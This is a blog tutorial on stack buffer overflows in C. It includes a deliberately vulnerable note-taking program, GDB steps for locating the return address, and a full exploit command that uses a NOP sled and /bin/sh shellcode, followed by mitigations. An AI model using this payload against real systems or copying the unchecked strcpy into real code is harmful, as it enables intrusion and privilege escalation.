Buffer Overflow and Exploitation
Buffer overflows are as old as the world itself. Even though this class of bug is far from new, it is still one of the most exploited vulnerabilities, and it often opens the door to further attacks. I first learned to code in C, a language infamous for not being memory-safe, and in this article I would like to draw on that experience to introduce you to the world of buffer overflows.
Before we start to talk about buffer overflow, we should first understand how memory works. Imagine you have a bookshelf where you store your books. The bookshelf itself represents the buffer in which we are inserting the books. Each slot on the shelf is designed to hold one book. You've planned to put exactly 10 books on this shelf. If you try to stuff more than 10 books into those slots, books will start to fall out, or even push other books out of their designated places.
In computer terms, that bookshelf is like a block of memory allocated for storing data, and each book is a piece of data. If you write more data than the memory can hold, it will "overflow" into adjacent memory areas.
When developers write code, they specify how much memory (i.e. how many "slots" on the bookshelf) they will need. A buffer overflow vulnerability occurs when the code doesn't properly check how much data (how many "books") is being put into that memory. If someone (often a malicious attacker) stuffs in more data than the memory can hold, the excess overwrites adjacent memory areas. This can cause the program to behave unexpectedly, crash, or, in the worst-case scenario, allow the attacker to execute their own malicious code. So, a buffer overflow is like overstuffing a bookshelf, causing chaos and sometimes letting bad actors rearrange your books to tell their own story.
Buffer and memory visualization
Now that we understand what a buffer is, let's talk about how it works. In C, a buffer is simply an array of a certain data type. We can create a simple buffer that holds 8 characters like this:
char buffer[8];
We can imagine the buffer as one block made up of 8 smaller blocks, one per character. When the buffer is a local variable, it lives inside the stack frame of the function that declares it. All of memory is made up of such small blocks, which are allocated to the applications and processes running on our systems.
+----------------+
| ... |
+----------------+
| buffer[7] |
+----------------+
| ... |
+----------------+
| buffer[1] |
+----------------+
| buffer[0] |
+----------------+
| ... |
+----------------+
Memory addressing and important pointers/registers
Each memory slot has a hexadecimal address associated with it. Memory addresses increase as we go up, so our buffer (bookshelf) spans the addresses 0x1010 to 0x102C. The diagram draws one element per 4-byte slot to keep it readable; in a real program, each char occupies a single byte. Within the stack frame, there are also some interesting values tied to registers/pointers, which we will talk about shortly. These pointers let us refer to important places within the stack without having to remember the hexadecimal addresses.
+-----------------------------------------------------+
| Address: 0x1040 | ... | <- Top of memory
+-----------------------------------------------------+
| Address: 0x103C | ... |
+-----------------------------------------------------+
| Address: 0x1038 | ... |
+-----------------------------------------------------+
| Address: 0x1034 | RET | <- Return Address (loaded into EIP on return)
+-----------------------------------------------------+
| Address: 0x1030 | Saved EBP | <- EBP
+-----------------------------------------------------+
| Address: 0x102C | buffer[7] |
+-----------------------------------------------------+
| Address: 0x1028 | buffer[6] |
+-----------------------------------------------------+
| Address: 0x1024 | buffer[5] |
+-----------------------------------------------------+
| Address: 0x1020 | buffer[4] |
+-----------------------------------------------------+
| Address: 0x101C | buffer[3] |
+-----------------------------------------------------+
| Address: 0x1018 | buffer[2] |
+-----------------------------------------------------+
| Address: 0x1014 | buffer[1] |
+-----------------------------------------------------+
| Address: 0x1010 | buffer[0] | <- ESP
+-----------------------------------------------------+
| Address: 0x100C | ... | <- Bottom of memory
+-----------------------------------------------------+
You might be wondering what ESP, EBP and EIP mean. Let's take a look:
EBP (Base Pointer) points to the base of the current stack frame and stays fixed while the function runs
ESP (Stack Pointer) points to the current top of the stack
EIP (Instruction Pointer) points to the next instruction to be executed
There is also the return address (RET), a value saved on the stack when a function is called. When the function finishes, this value is loaded into EIP. By cleverly overwriting it, we can make the program execute some of our mischievous code.
Vulnerable application
Now that we know what buffers are and how to create one, let's take a look at this innocent note-taking application, whose only functionality is letting the user take notes. As we can see, the function createNote() takes the given input and copies it into a buffer, which is then written to a file.
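#include <stdio.h>
#include <string.h>

void createNote(char *note) {
    char buffer[400];
    /* Deliberately vulnerable: strcpy() copies until it meets a NUL byte
       and never checks the size of buffer. */
    strcpy(buffer, note);
    FILE *f = fopen("note.txt", "w");
    if (f != NULL) {
        /* A fixed format string keeps the note from being parsed as one. */
        fprintf(f, "%s", buffer);
        fclose(f); /* only close a file that was actually opened */
    }
}

int main(int argc, char *argv[]) {
    if (argc == 2) {
        createNote(argv[1]);
    }
    return 0;
}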
Let's visualize the stack frame used by this function. The offsets are illustrative: each char takes one byte, and the compiler is free to add padding or reorder local variables.
+--------------------+------------------------+
| ...                | ...                    |
+--------------------+------------------------+
| Address: ???       | Return Address to main | <- EIP is set to this upon return
+--------------------+------------------------+
| Address: ???-4     | Saved EBP (from main)  | <- Old EBP
+--------------------+------------------------+ <- New EBP (for createNote)
| Address: ???-5     | buffer[399]            |
| ...                | ...                    |
| Address: ???-404   | buffer[0]              |
+--------------------+------------------------+
| Address: ???-408   | FILE *f                |
+--------------------+------------------------+
| Address: ???-412   | ...                    | <- Other local variables, padding, etc.
+--------------------+------------------------+
| Address: ???-???   | ...                    | <- ESP will change as function calls occur
+--------------------+------------------------+
From this visualization, we can see that the buffer can store 400 characters, but the issue with the strcpy() function is that it doesn't check the size of the data we are trying to pass. If we pass more than the buffer can hold, the copy runs past its end and overwrites whatever sits next to it on the stack, including the saved EBP and the return address.
Where is Waldo? I mean... where is EIP?
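Great! We now have a vulnerable application on our system. The next step is to find where the saved return address (the value that ends up in EIP) sits relative to the buffer, because it doesn't have to come right after the buffer and the saved EBP: the compiler may place padding or other local variables in between. For this, we can use GDB, a debugger used mainly for C and C++ code. I will use Python (the commands use Python 2 syntax) to create inputs that help me map the stack. My goal is to find a payload whose length covers exactly the buffer, the saved EBP and the return address. Once the input is long enough to corrupt the return address, the program crashes with a segmentation fault, and the debugger shows which bytes ended up in EIP.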
gdb -q --args ./noteplusplus `python -c 'print "A" * 412 + "BCDE"'`
After some testing, I discovered that the payload has to be 416 bytes long: the buffer (plus any padding) and the saved EBP take 412 bytes, and the return address occupies the last four bytes. The reason for appending the string "BCDE" is its hexadecimal representation. It translates to the bytes 0x42, 0x43, 0x44 and 0x45, which we can easily spot in the debugger. To better visualize the stack, you can use the x/32z $esp command within the debugger, which displays 32 units of memory (4-byte words by default) as zero-padded hexadecimal, starting at the top of the stack (where ESP points). Hit the Enter key to keep scrolling until you see a sequence of 0x41414141, which represents the letters A. After some time, you should be able to see a single cell containing the value 0x45444342 (x86 is little-endian, so this value represents the BCDE string).
In my case, I was able to retrieve this address:
0xffffac50: 0x41414141 0x41414141 0x41414141 0x45444342
Shall we use Shellcodes?
In the previous example, we filled the stack with arbitrary values. What if we used some (perhaps harmful) instructions instead? This is where shellcode enters the picture. Shellcode is a small piece of machine code that is frequently used as a payload for exploitation. There is a large database of shellcodes for educational purposes available at shell-storm.org. I am going to select one that opens a shell.
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\
At the end of our shellcode, we have to append the address we want execution to jump to. We would like this address to point into our buffer on the stack (the address that you got by calling x/32z $esp in gdb). Written in reverse (little-endian) byte order, this address overwrites the saved return address and therefore ends up in the EIP register.
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh + \x50\xac\xff\xff
We have all the necessary parts set up. The only thing remaining is to set up the attack string which will be passed as a parameter to our vulnerable application. To create an attack string, we have to do some calculations.
We know that the buffer and the saved EBP together take up 412 bytes
Our shellcode has 53 bytes
412 - 53 = 359, which means that we have to fill the remaining space with 359 bytes of arbitrary nonsense
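As the "arbitrary nonsense," we can use the NOP (No operation) instruction, which has the hexadecimal value 0x90 on Intel x86 processors, both 32-bit and 64-bit (other architectures use different encodings). A run of NOPs also gives us some slack: if the return address points anywhere inside it, execution slides forward into the shellcode. With this knowledge, we can call our program like this: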
./noteplusplus `python -c 'print "\x90" * 359 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\x50\xac\xff\xff"'`
Running this opens a shell through the vulnerable Note++ application. This is particularly dangerous if the binary has the SUID/SGID bit set, because the shell then runs with the privileges of the file's owner or group.
Are there any protections?
Of course, there are a lot of ways to protect against buffer overflows. The first would be to switch from strcpy() to strncpy(), which limits the amount of data that can be written into the buffer. Note that strncpy() does not add a terminating NUL byte when the source is too long, so the code has to add it itself. Another option is to enable the SC, DEP and ASLR protections. We could also use a scanner (like Snyk Code) to help us find and prevent issues like these.
SC (Stack Canary) places a secret value on the stack between the local variables and the saved return address. This value changes every time we run the program. Before a function returns, the value is checked, and if it has been modified, the program exits.
DEP (Data Execution Prevention) stops the system from executing code located in memory regions that should only contain data, such as the stack
ASLR (Address Space Layout Randomization) randomizes where the stack, heap and libraries are placed in memory, so the addresses differ every time we run a program
If you have read so far, you might want to follow me here on Hashnode. Feel free to connect with me over at LinkedIn or Mastodon.
Written by
Hung Ngo
Humorous, unique, nerdy genius who loves coding, cybersecurity, cats, and pancakes. I occasionally share my passion with others via blog posts.